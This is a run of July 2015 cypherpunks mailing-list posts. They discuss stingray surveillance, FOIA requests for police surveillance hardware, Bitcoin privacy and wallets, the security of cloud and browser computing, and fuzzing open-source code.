enforcement’s > arsenal. My problem is that I want it to be used pursuant to a high > standard of proof that it’s needed, and that I want the approval > process to be more transparent. One of the reasons I’d like to see > some more documentation of stingray applications and orders is because > I have this suspicion—but there’s no way of confirming it one way or > another—that some judges are signing approvals to use this technology > thinking that they’re just signing a pen register. 
If a judge thinks > it’s [just] another pen register application, they’re just going to > sign it without giving it much pause. > > > Now that the use of stingrays and related technologies has been > made public, where will this issue be a year or a few years from now? > > A year from now I think we’re in the same position. You’re dealing > with outdated statutes concerning new and very different technology. > It’s possible in five years maybe that Congress will step in and do > something. More likely, state legislatures will take most of the > action to monitor this type of surveillance. Washington State, > California [and others] have already acted, and Texas is evaluating > the standards for approving stingray use. > From coderman at gmail.com Wed Jul 15 02:16:24 2015 From: coderman at gmail.com (coderman) Date: Wed, 15 Jul 2015 02:16:24 -0700 Subject: Why do people still use Google services? (was Re: Encryption Rights - A Google+ community) In-Reply-To: References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> Message-ID: On 7/15/15, Seth wrote: > ... > I've come to the conclusion that almost without exception, people will opt > for convenience over privacy and dignity. you should know that convenient and vulnerable is subsidized by the billions, advertisers and intelligence spooks all the same, same as it ever was... [ so worse than predisposition, you've got active adversary on top! ] fun problems :) best regards, From coderman at gmail.com Wed Jul 15 02:37:22 2015 From: coderman at gmail.com (coderman) Date: Wed, 15 Jul 2015 02:37:22 -0700 Subject: [cryptome] Re: FOIPA adventures In-Reply-To: References: <000701d0bcb7$94118e80$bc34ab80$@co.uk> Message-ID: and three appeals of rejected @FBI: (my first appeal(s)! :) "The number of Digital Receiver Technology units model DRT 1201 used by, or owned or leased by the agency."
- https://www.muckrock.com/foi/united-states-of-america-10/drtbox-18541/ "The number of Harris Corporation KingFish systems/devices used by, or owned or leased by the agency." - https://www.muckrock.com/foi/united-states-of-america-10/kingfishing-18594/ "Any and all SKUs, Contracts, Invoices, Receipts, Billing Numbers, Agreements, PO Numbers, for any services or goods purchased from Boeing Corporation, including third party contract hours for training or related services, regarding hardware to include Digital Signal Processing (DSP) or Cell-site Simulators or Software Defined Radio (SDR) base-stations, or Stingray-like pen/trace-trap devices, or other radio surveillance technology, including technology formerly produced by Digital Receiver Technology, Inc., also known as DRT Systems, now part of Boeing, known to include the DRTBox, or DirtBox, or DirtBoxes surveillance gear. Please include antenna systems and cable hardware, as part of the radio systems to report on." - https://www.muckrock.com/foi/united-states-of-america-10/drtbeboeingbox-18708/ From mirimir at riseup.net Wed Jul 15 01:44:40 2015 From: mirimir at riseup.net (Mirimir) Date: Wed, 15 Jul 2015 02:44:40 -0600 Subject: Why do people still use Google services? (was Re: Encryption Rights - A Google+ community) In-Reply-To: References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> Message-ID: <55A61D78.6090101@riseup.net> On 07/15/2015 01:21 AM, Seth wrote: > Let’s get serious. These companies [Apple and Google] are both as good > or as bad as we allow them to be. There is no hero here. In the immortal > words of John Adams, > > There is nothing which I dread so much as a division of the republic > into two great parties, each arranged under its leader, and concerting > measures in opposition to each other. This, in my humble apprehension, > is to be dreaded as the greatest political evil under our Constitution. 
Apple = AOL Google = CompuServe From odinn.cyberguerrilla at riseup.net Wed Jul 15 03:37:39 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Wed, 15 Jul 2015 03:37:39 -0700 Subject: Bitcoin exchanges. In-Reply-To: References: Message-ID: <55A637F3.2020401@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Don't use BitPay, Coinbase, Circle. You may, however, wish to try https://www.bitwage.co/ (or you might not) Note: This is not me providing any endorsement for bitwage, but there is an article about someone's experience with it here: https://open.bufferapp.com/getting-paid-in-bitcoin/ Re. your "untraceable" remarks, bitcoin is not untraceable. It's basically transparent. There are a few things that have been added recently to enhance privacy, but sorry, not untraceable or anonymous or anything like that. The things that _you_ can do to enhance the privacy on your side are: Don't use web wallets (with the possible exception of Coinkite, if you are comfortable using it...) Do use hardware wallet (e.g. Trezor) or something you can install and manage from your laptop (e.g. Electrum) (Note that these don't require you to sign up for a service with anyone.) If you have accounts with Coinbase, BitPay, or other firms with web-based wallet servic(es) that are bound by AML/KYC, TISA, FATCA, a growing body of FINCEN and state-by-state requirements, you are better off just transferring your coins away from those firms and closing your accounts. Don't use Coinbase or BitPay as a payment processor if you are a business, instead consider Mycelium Gear -- gear.mycelium.com -- or Coinsimple - discussed at https://www.reddit.com/r/Bitcoin/comments/35evi0/eli5_difference_between_mycelium_gear_and/ On 07/08/2015 06:20 AM, uwecerron at gmail.com wrote: > I thought bitpay had a payroll option. > > Sent from my iPhone > > On Jul 8, 2015, at 8:41 AM, Edd thompson > wrote: > >> Is there any way a person can get their paycheck direct deposit >> to a Bitcoin?
So instead of a deposit to a checking account it >> goes to an exchange that converts it for you? And then is there a >> good way to access currency in rural areas? I have seen a few >> videos and read overviews but they never get to how to make it >> practical for people not in big cities, hell it just doesn't seem >> practical at all unless you live near an exchange or are willing >> to do credit card transactions that cost on top of the exchange >> and make the currency traceable. >> - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVpjfyAAoJEGxwq/inSG8CCPwIAIeOXdysrrmUQfIx72X49BYP n3fE00bYgEBA2m/hGu1icMEDH0FHFYucngPppAKoISnMWqNdu0P+L4bHLhQdwPsa i19rw+L8EVqiFwDaSZ/N0uvsLAnb01kpCXOhJDb+QREAds/+WJA7x0DoGXP2zh5t NsLSrjT4CtyzOgf0fHACxr7TJyIniQqxpqbmKc5DQlnKDvWkRCTEwdipkprA9LNX DkkzIB5cRg3Kt7wxgUybQgwZSG8Q5jl9JagJCT7SQP9Ol+xzVrAmWTzNcSdb8icd C93nMyeIl5BGWhxyw0C6kEaWwguCIn/YdHshEp90aTCxwjTQ4kGB+j9qU22VvF8= =nBcY -----END PGP SIGNATURE----- From mirimir at riseup.net Wed Jul 15 04:57:40 2015 From: mirimir at riseup.net (Mirimir) Date: Wed, 15 Jul 2015 05:57:40 -0600 Subject: Bitcoin exchanges. In-Reply-To: <55A637F3.2020401@riseup.net> References: <55A637F3.2020401@riseup.net> Message-ID: <55A64AB4.2080902@riseup.net> On 07/15/2015 04:37 AM, odinn wrote: > Re. your "untraceable" remarks, bitcoin is not untraceable. It's > basically transparent. There are a few things that have been added > recently to enhance privacy, but sorry, not untraceable or anonymous > or anything like that. | China-based Bitcoin exchange Bter has announced that it will | continue to operate its service and pay back all its users in | time, following a cyberattack that saw the company lose $1.75 | million in cryptocurrency to hackers. 
| | Bter says that it managed to trace the stolen 7,170 BTC to a | Bitcoin mixer (a cryptocurrency laundering service) called | Bitcoin Fog, but hasn’t heard from the company despite | repeated attempts to make contact. http://thenextweb.com/insider/2015/03/12/chinese-bitcoin-exchange-bter-will-pay-back-users-after-losing-1-75-million-in-cyberattack/ Bitcoin Fog is a Tor hidden service. If they can successfully launder 7170 BTC, that's good enough for me. From alfiej at fastmail.fm Tue Jul 14 15:11:23 2015 From: alfiej at fastmail.fm (Alfie John) Date: Wed, 15 Jul 2015 08:11:23 +1000 Subject: an ominous comment In-Reply-To: <20150714155203.826F52282E2@palinka.tinho.net> References: <20150714155203.826F52282E2@palinka.tinho.net> Message-ID: <1436911883.2378653.323829961.5C2CB795@webmail.messagingengine.com> On Wed, Jul 15, 2015, at 01:52 AM, dan at geer.org wrote: > CxO: We have to prepare for the day when no software we depend on is run on premises. Zen Master: Then we have to prepare for the day that all adversaries know all our secrets. On hearing this, the CxO was enlightened. Alfie -- Alfie John alfiej at fastmail.fm From chgans at gna.org Tue Jul 14 16:42:14 2015 From: chgans at gna.org (Christian Gagneraud) Date: Wed, 15 Jul 2015 11:42:14 +1200 Subject: [Cryptography] Super-computer project wanted In-Reply-To: References: <55A53867.4090100@sonic.net> Message-ID: <55A59E56.5020206@gna.org> On 15/07/15 08:44, grarpamp wrote: >>>> dave at horsfall.org >>>> So, is there anything that could benefit from a few parallel > teraflops here and there? > > On Tue, Jul 14, 2015 at 12:27 PM, Ray Dillinger wrote: >> Or you could apply static code analysis software to huge >> masses of existing operating system, device driver, plugin, >> email-client or god-help-us browser code in wide use and >> see if you can't spot instances of dangerous vulnerabilities >> like buffer overflows. 
A list of known errors would be >> very helpful in getting code up to 'bulletproof' reliability >> and no one runs ALL the possible static analysis we know >> about on large bodies of code because it takes too long on >> regular computers. > > This, and fuzzing... of all the opensource OS's and all the > ported packages they supply. And dump all of github in it > for fun. FYI, the AFL fuzzer already has an impressive trophy case: See "The bug-o-rama trophy case" at http://lcamtuf.coredump.cx/afl/ > It takes too long, too much developer time, a different > skillset, opensource test suites may not yet cover some > areas that commercial ones do, etc. > > Ripe for development of an open perpetual audit project. > > That, and printing your own open and trusted chips, in your own > open and trusted fab, are possible now. It's big picture, grand slam, > full circle headiness, but it is doable. People just have to get > together and kick it off. > From coderman at gmail.com Wed Jul 15 14:31:21 2015 From: coderman at gmail.com (coderman) Date: Wed, 15 Jul 2015 14:31:21 -0700 Subject: Encryption Rights - A Google+ community In-Reply-To: <20150714094523.637C2C00027@frontend1.nyi.internal> References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> Message-ID: On 7/14/15, Shelley wrote: > ... > I'm glad it's not just me! That was my reaction too but I held back from > commenting, because I feel like I'm always bitching here about cpunks or > anyone interested in privacy still using google for any reason. I don't > understand it. valid ways to GOOG: - ironically; my favorite. gmail nicely expressing my contempt for email! - effectively; google play droid betas? gotta join the circle+jerk++ - side-channel-informationally; this only works if they fight NSL's and court orders for content and account metadata. - expediently; 8.8.8.8 and everywherecaches quite in-parallel convenient :) - yours?
best regards, From odinn.cyberguerrilla at riseup.net Wed Jul 15 22:53:16 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Wed, 15 Jul 2015 22:53:16 -0700 Subject: Stuff Is Happening, Your Thoughts Sought On It Message-ID: <55A746CC.6030004@riseup.net> Hello, Over the course of the better part of a year, I've been communicating with BCN developers, and now, the ABIS microdonations concept (http://abis.io) will be implemented in the Bytecoin (BCN) Wallet after a Change Request is discussed and finalized. But before that happens, community discussion is needed on this change request draft. I seriously look forward to your thoughts on this stuff. Discussion: https://bytecointalk.org/showthread.php?tid=82 -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn From coderman at gmail.com Thu Jul 16 00:45:47 2015 From: coderman at gmail.com (coderman) Date: Thu, 16 Jul 2015 00:45:47 -0700 Subject: FOIPA adventures In-Reply-To: References: <000701d0bcb7$94118e80$bc34ab80$@co.uk> Message-ID: new reqs: "Count of "Hardware Security Module", "HSM", "Cryptographic Accelerator", or "VPN Accelerator" devices or equivalent in use or purchased by the department. This is to include devices which are incorporated into larger computing facilities such as databases, servers, switches, and routers.
Please include processing notes for this request, even if request is denied in part." @FBI https://www.muckrock.com/foi/united-states-of-america-10/hardwaresecmods-19755/ @CIA https://www.muckrock.com/foi/united-states-of-america-10/hardwaresecmods-19756/ @DoJ https://www.muckrock.com/foi/united-states-of-america-10/hardwaresecmods-19757/ @DoD-OIG https://www.muckrock.com/foi/united-states-of-america-10/hardwaresecmods-19758/ @DoD-SecDef https://www.muckrock.com/foi/united-states-of-america-10/hardwaresecmods-19759/ @DHS https://www.muckrock.com/foi/united-states-of-america-10/hardwaresecmods-19760/ @USSS https://www.muckrock.com/foi/united-states-of-america-10/hardwaresecmods-19761/ best regards, From grarpamp at gmail.com Wed Jul 15 23:15:01 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 16 Jul 2015 02:15:01 -0400 Subject: [tor-talk] Research - Black Market Archives In-Reply-To: <55A73676.2010703@metaverse.org> References: <55A73676.2010703@metaverse.org> Message-ID: > Gwern Branwen has scraped/mirrored on a weekly or daily basis all existing English-language Dark Net Markets as part of research into their usage, lifetimes/characteristics, & legal riskiness. > A torrent of the scraped data is now publicly released as a 52GB (~1.6TB) collection covering 89 DNMs & 37+ related forums, representing <4,438 mirrors, and can be found at . There were a few archivists active in the early days. Due to various reasons, their archives may never see the light of day. For those that still have some, the feeling of a finger hovering over rm is a rather intoxicating experience, and the nostalgia of pointing their browser at http://127.0.0.1/ is quite fine indeed :) Kudos Gwern on your publication. Over a decade's worth of other stories are certainly waiting to be told. 
From coderman at gmail.com Thu Jul 16 02:33:38 2015 From: coderman at gmail.com (coderman) Date: Thu, 16 Jul 2015 02:33:38 -0700 Subject: FOIPA adventures In-Reply-To: References: <000701d0bcb7$94118e80$bc34ab80$@co.uk> Message-ID: moar new reqs: "The number of "HotPlug" forensic power override devices or equivalent in use or purchased by the Bureau. This is to include official CRU® WiebeTech® HotPlug™ systems or equivalent forensic power override systems by other suppliers. Please include processing notes for this request, even if request is denied in part." @FBI https://www.muckrock.com/foi/united-states-of-america-10/hotpluggedin-19762/ @CIA https://www.muckrock.com/foi/united-states-of-america-10/hotpluggedin-19763/ @DEA https://www.muckrock.com/foi/united-states-of-america-10/hotpluggedin-19764/ @DHS https://www.muckrock.com/foi/united-states-of-america-10/hotpluggedin-19765/ @DoD-OIG https://www.muckrock.com/foi/united-states-of-america-10/hotpluggedin-19766/ @DoD-SecDef https://www.muckrock.com/foi/united-states-of-america-10/hotpluggedin-19767/ @USSS https://www.muckrock.com/foi/united-states-of-america-10/hotpluggedin-19768/ best regards, From sdw at lig.net Thu Jul 16 10:09:23 2015 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 16 Jul 2015 10:09:23 -0700 Subject: an ominous comment In-Reply-To: <55A567F3.1000006@m-o-o-t.org> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <55A567F3.1000006@m-o-o-t.org> Message-ID: <55A7E543.7010505@lig.net> On 7/14/15 12:50 PM, Peter Fairbrother wrote: > On 14/07/15 18:02, Stephen D. Williams wrote: >> Everything will be run in the cloud and browser because it is, overall, >> a better computation model. > > > > It is? Why? The browser provides a super feature / security / quality / portable baseline that is rapidly improving. Only a few alternatives come close and they all fall short in major ways: Qt (which greatly relies on browser tech now), Java & C#, Unity, UnReal, etc. 
Certain things are still better in those alternatives, but less and less. With Javascript optimization, ASM.js, SIMD.js, WebGL, etc., browsers have, for most purposes, resolved the computational gap while having massively better security stance. WebComponents, the new binary Javascript format, along with WebRTC, WebUSB, and other features, we're getting the cleanest app and platform model we've seen so far. The key architectural questions about remote communication involve security, efficiency, stability, portability, etc. While it isn't perfect, web tech provides a nice enough model for expressing the highest level logical communication needed in secure (enough for most purposes), flexible, efficient enough, and low latency enough for most purposes ways. Solutions like Swagger, Go, and other modern techniques are much cleaner and simpler than previous clunky solutions. Most of the most interesting web apps now run almost completely in the browser. The server side sends the original page and code, manages authentication, then acts mostly as a database with minimal logic. As long as the API doesn't rely solely on client-side validation and other things that could be gamed, it can still be secure. Because it's now easy to run the same code on the front and back, complex validation could be done on the front-end for low latency and the backend for actual security, for instance. There are plenty of things that could be better and will get better, but regardless the power & ease gap between web app development, for most situations, is only increasing. Emulating any substantial subset of browser-level UI and other features in a non-browser desktop app is nearly impossible now. > > > > -- Peter Fairbrother sdw From sdw at lig.net Thu Jul 16 10:14:18 2015 From: sdw at lig.net (Stephen D.
Williams) Date: Thu, 16 Jul 2015 10:14:18 -0700 Subject: an ominous comment In-Reply-To: <20150716145142.GA2610@sivokote.iziade.m$> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> Message-ID: <55A7E66A.9010403@lig.net> On 7/16/15 7:51 AM, Georgi Guninski wrote: > On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: >> In a lot of ways, this is an elegant solution and could arguably be >> much more secure than desktop apps in Windows. Assuming your > Lol, is this positive or negative argument? > > it can hardly be less secure than windoze imho. Cypherpunks + Windows, what do you think? sdw From sdw at lig.net Thu Jul 16 10:17:51 2015 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 16 Jul 2015 10:17:51 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: <55A7E73F.6070507@lig.net> On 7/14/15 10:35 AM, John Young wrote: > Cloud and browser together constitute the most invasive programs > since religion was invented and rewarded to absolve overreaching > and abusive authority. You don't think ODBC (which was Microsoft's fault, via ANSI) was worse? CORBA? Windows itself? SMB file servers? We are in massively better shape than we used to be. > > Both cloud and browser are deliberately designed to mislead users > about their threats to privacy and security. Iterations, adjustments, > corrections of errors, automatic upgrades, official endorsements, > repeatedly easy hacks, futile hearings of maladies long known and > ignored, concentration of computer power, reduction of alternatives, > foretell disaster as if natural, expected, bearable, and better than > DIY, desktop, solo solutions, mavericks, and worst of all, openness.
Even narrowly true levels of security are better than what we used to have. Certainly we need to keep getting better. > > Cloud and browser are like imperial dogma, what's good for the > empire operators is good for the people. Although cloud and > browser to succeed must have access to all the people's private > data to assure they remain peaceable. It's getting better. Fund Firefox to keep the pressure on. > > Sysadmins are the Cromwells, the Hacking Teams, the > Kasperskys, violating law with impunity. sdw > > > At 01:02 PM 7/14/2015, you wrote: >> Everything will be run in the cloud and browser because it is, overall, a better computation model. However, that doesn't >> preclude you from running a cloud locally. Although pretty much proprietary to Google & Amazon until recently, Docker et al and >> related VM/container management APIs that are mappable to all kinds of implementations will allow apps, administration, >> networking, etc. to be fluid between commercial and various types of private clouds. >> >> In a lot of ways, this is an elegant solution and could arguably be much more secure than desktop apps in Windows. Assuming your >> container system isn't running in Windows, which is becoming an option; one that I won't trust easily. >> >> sdw >> >> On 7/14/15 8:52 AM, dan at geer.org wrote: >>> >>> Discussing security policy post-OPM debacle in a setting to >>> which >>> I have access (sorry to be oblique), it was said by a CxO "We have >>> to prepare for the day when no software we depend on is run on >>> premises." >>> >>> I did not handle this well (think sputtering as an alternative to >>> white rage). At the same time, I am probably in a bubble in that >>> I suspect that nearly everyone I see with a computer (of any form >>> factor) is already in that situation or, save for Javascript piped >>> in from the cloud to run locally, soon will be -- denizens of this >>> list and a few others excepted.
>>> >>> Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, >>> perhaps, "Is anything to be done?" >>> >>> --dan >> -- Stephen D. Williams sdw at lig.net stephendwilliams at gmail.com LinkedIn: http://sdw.st/in V:650-450-UNIX (8649) V:866.SDW.UNIX V:703.371.9362 F:703.995.0407 AIM:sdw Skype:StephenDWilliams Yahoo:sdwlignet Resume: http://sdw.st/gres Personal: http://sdw.st facebook.com/sdwlig twitter.com/scienteer From sdw at lig.net Thu Jul 16 10:28:20 2015 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 16 Jul 2015 10:28:20 -0700 Subject: an ominous comment In-Reply-To: <1436911883.2378653.323829961.5C2CB795@webmail.messagingengine.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <1436911883.2378653.323829961.5C2CB795@webmail.messagingengine.com> Message-ID: <55A7E9B4.6030307@lig.net> On 7/14/15 3:11 PM, Alfie John wrote: > On Wed, Jul 15, 2015, at 01:52 AM, dan at geer.org wrote: >> CxO: We have to prepare for the day when no software we depend on is run on premises. > Zen Master: Then we have to prepare for the day that all adversaries > know all our secrets. > > On hearing this, the CxO was enlightened. Sharing all of your secrets, then prosecuting adversaries that make ill use of it, in court and the court of public opinion, is a valid path. Better, throw in some misinformation so that they are misled in self-sabotaging ways. If you are speaking on a line that you know is being recorded by "authorities", what should you be talking about? In the US at least, perhaps something that would make listeners blush or spend time chasing phantoms or something. Might as well get your money's worth. At some point I realized that I should just go to court for every ticket or other opportunity.
If the alternative is that you certainly have to pay, then you might as well learn, get comfortable protecting yourself in court, say your piece, and try whatever legal argument you can think of. I have about a 50% win rate. Interesting how certain companies, Apple, feel they need to be totally opaque while others, Google and others, are closer to being mostly open. Space-X and/or Tesla are giving away free use of some patents, a somewhat related example. > Alfie > sdw From chgans at gna.org Wed Jul 15 15:46:58 2015 From: chgans at gna.org (Christian Gagneraud) Date: Thu, 16 Jul 2015 10:46:58 +1200 Subject: [Cryptography] Super-computer project wanted In-Reply-To: <55A59E56.5020206@gna.org> References: <55A53867.4090100@sonic.net> <55A59E56.5020206@gna.org> Message-ID: <55A6E2E2.7030101@gna.org> On 15/07/15 11:42, Christian Gagneraud wrote: > On 15/07/15 08:44, grarpamp wrote: >>>>> dave at horsfall.org >>>>> So, is there anything that could benefit from a few parallel >> teraflops here and there? >> >> On Tue, Jul 14, 2015 at 12:27 PM, Ray Dillinger wrote: >>> Or you could apply static code analysis software to huge >>> masses of existing operating system, device driver, plugin, >>> email-client or god-help-us browser code in wide use and >>> see if you can't spot instances of dangerous vulnerabilities >>> like buffer overflows. A list of known errors would be >>> very helpful in getting code up to 'bulletproof' reliability >>> and no one runs ALL the possible static analysis we know >>> about on large bodies of code because it takes too long on >>> regular computers. >> >> This, and fuzzing... of all the opensource OS's and all the >> ported packages they supply. And dump all of github in it >> for fun.
> > FYI, the AFL fuzzer already has an impressive trophy case: > See "The bug-o-rama trophy case" at http://lcamtuf.coredump.cx/afl/ And here is a blog post about the future of the Linux Trinity fuzzer, used by Hacking Team to fuzz Android IOCTL. "I’m done enabling assholes." http://codemonkey.org.uk/2015/07/12/future-trinity/ Chris > >> It takes too long, too much developer time, a different >> skillset, opensource test suites may not yet cover some >> areas that commercial ones do, etc. >> >> Ripe for development of an open perpetual audit project. >> >> That, and printing your own open and trusted chips, in your own >> open and trusted fab, are possible now. It's big picture, grand slam, >> full circle headiness, but it is doable. People just have to get >> together and kick it off. >> > From drwho at virtadpt.net Thu Jul 16 10:52:00 2015 From: drwho at virtadpt.net (The Doctor) Date: Thu, 16 Jul 2015 10:52:00 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> Message-ID: <55A7EF40.5010401@virtadpt.net> On 07/16/2015 08:39 AM, Lodewijk andré de la porte wrote: > "All browsers suck"?.. They run HTML pretty darn well. I'd say HTML > is a document language, not an application language, and now it's > trying to http://lemire.me/blog/archives/2011/03/08/breaking-news-htmlcss-is-turing-complete/ http://beza1e1.tuxen.de/articles/accidentally_turing_complete.html > Not much wrong with JavaScript, but I hope they'll soon support > several http://cube-drone.com/comics/c/relentless-persistence Give it a little time; JavaScript bugs will become popular again. > But, pushing back, there's: * Latency/bandwidth to user * Loss of > end user's control over essential hardware * Massive trust and > security issues Easier to shut someone down with a single visit to the provider.
-- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Yoiks! And awaaaaaay!" From drwho at virtadpt.net Thu Jul 16 10:52:37 2015 From: drwho at virtadpt.net (The Doctor) Date: Thu, 16 Jul 2015 10:52:37 -0700 Subject: an ominous comment In-Reply-To: <55A7E66A.9010403@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> Message-ID: <55A7EF65.4040806@virtadpt.net> On 07/16/2015 10:14 AM, Stephen D. Williams wrote: > Cypherpunks + Windows, what do you think? I'll take "Dirty secrets of the twenty-first century for two hundred, Alex." -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Yoiks! And awaaaaaay!"
From shelley at misanthropia.org Thu Jul 16 10:55:06 2015 From: shelley at misanthropia.org (Shelley) Date: Thu, 16 Jul 2015 10:55:06 -0700 Subject: an ominous comment In-Reply-To: <55A7E66A.9010403@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> Message-ID: <20150716175450.2ECC6680133@frontend2.nyi.internal> On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote: > On 7/16/15 7:51 AM, Georgi Guninski wrote: > > On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: > >> In a lot of ways, this is an elegant solution and could arguably be > >> much more secure than desktop apps in Windows. Assuming your > > Lol, is this positive or negative argument? > > > > it can hardly be less secure than windoze imho. > > Cypherpunks + Windows, what do you think? > > sdw > It's making me break out in hives, stop it!
:p *shudder* From shelley at misanthropia.org Thu Jul 16 11:20:03 2015 From: shelley at misanthropia.org (Shelley) Date: Thu, 16 Jul 2015 11:20:03 -0700 Subject: an ominous comment In-Reply-To: <55A7EF40.5010401@virtadpt.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <55A7EF40.5010401@virtadpt.net> Message-ID: <20150716181947.85E896801A9@frontend2.nyi.internal> On July 16, 2015 11:00:31 AM The Doctor wrote: > http://cube-drone.com/comics/c/relentless-persistence Heh. There is a "share on facebutts" link :D When .space became available I bought a few domains, one being assbook.space. I was going to make it into an anti-social media forum, but the few times I've emailed someone from it it was marked as probable pr0n spam :D Ah, well... On topic: .js still sucks and so does the cloud. The End! -S From shelley at misanthropia.org Thu Jul 16 11:58:39 2015 From: shelley at misanthropia.org (Shelley) Date: Thu, 16 Jul 2015 11:58:39 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> <20150716175450.2ECC6680133@frontend2.nyi.internal> Message-ID: <20150716185822.D75496801A9@frontend2.nyi.internal> On July 16, 2015 11:49:47 AM grarpamp wrote: > On Thu, Jul 16, 2015 at 1:55 PM, Shelley wrote: > > On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote: > > > >> On 7/16/15 7:51 AM, Georgi Guninski wrote: > >> > On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: > >> >> In a lot of ways, this is an elegant solution and could arguably be > >> >> much more secure than desktop apps in Windows. Assuming your > >> > Lol, is this positive or negative argument? > >> > > >> > it can hardly be less secure than windoze imho. > >> > > > >> Cypherpunks + Windows, what do you think? > > > > It's making me break out in hives, stop it! 
:p > > > > *shudder* > > The bazillion lines of effectively unaudited code in opensource > kernels and software should have the same effect upon you. It does; nothing is ever 100% safe, we must not become complacent. But FOSS : acne, Windoze (and Flash, Java, .js, etc) : ebola! -S From sdw at lig.net Thu Jul 16 12:33:55 2015 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 16 Jul 2015 12:33:55 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> <20150716175450.2ECC6680133@frontend2.nyi.internal> Message-ID: <55A80723.5060405@lig.net> On 7/16/15 11:44 AM, grarpamp wrote: > On Thu, Jul 16, 2015 at 1:55 PM, Shelley wrote: >> On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote: >> >>> On 7/16/15 7:51 AM, Georgi Guninski wrote: >>>> On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: >>>>> In a lot of ways, this is an elegant solution and could arguably be >>>>> much more secure than desktop apps in Windows. Assuming your >>>> Lol, is this positive or negative argument? >>>> >>>> it can hardly be less secure than windoze imho. >>> Cypherpunks + Windows, what do you think? >> It's making me break out in hives, stop it! :p >> >> *shudder* > The bazillion lines of effectively unaudited code in opensource > kernels and software should have the same effect upon you. I personally have audited quite a bit of FOSS (and enough spot checkers can get pretty good coverage), but not one line of proprietary Microsoft, Oracle, or Apple code. Your fears may be misplaced. sdw
From alan at clueserver.org Thu Jul 16 12:49:26 2015 From: alan at clueserver.org (alan at clueserver.org) Date: Thu, 16 Jul 2015 12:49:26 -0700 Subject: an ominous comment In-Reply-To: <55A80723.5060405@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <55A540A7.6080808@lig.net> <20150716145142.GA2610@sivokote.iziade.m$> <55A7E66A.9010403@lig.net> <20150716175450.2ECC6680133@frontend2.nyi.internal> <55A80723.5060405@lig.net> Message-ID: <6d352c854bb75a56c719949fe6362459.squirrel@clueserver.org> > On 7/16/15 11:44 AM, grarpamp wrote: >> On Thu, Jul 16, 2015 at 1:55 PM, Shelley >> wrote: >>> On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote: >>> >>>> On 7/16/15 7:51 AM, Georgi Guninski wrote: >>>>> On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: >>>>>> In a lot of ways, this is an elegant solution and could arguably be >>>>>> much more secure than desktop apps in Windows. Assuming your >>>>> Lol, is this positive or negative argument? >>>>> >>>>> it can hardly be less secure than windoze imho. >>>> Cypherpunks + Windows, what do you think? >>> It's making me break out in hives, stop it! :p >>> >>> *shudder* >> The bazillion lines of effectively unaudited code in opensource >> kernels and software should have the same effect upon you. > > I personally have audited quite a bit of FOSS (and enough spot checkers > can get pretty good coverage), but not one line of > proprietary Microsoft, Oracle, or Apple code. Your fears may be > misplaced. Large companies regularly scan their open source (and proprietary code) with Black Duck's ProtexIP software. That product shows if code is "borrowed" from other places. They also have open source tools that do similar things. The idea that open source is filled with stolen code is FUD.

From grarpamp at gmail.com Thu Jul 16 11:44:10 2015
From: grarpamp at gmail.com (grarpamp)
Date: Thu, 16 Jul 2015 14:44:10 -0400
Subject: an ominous comment
In-Reply-To: <20150716175450.2ECC6680133@frontend2.nyi.internal>
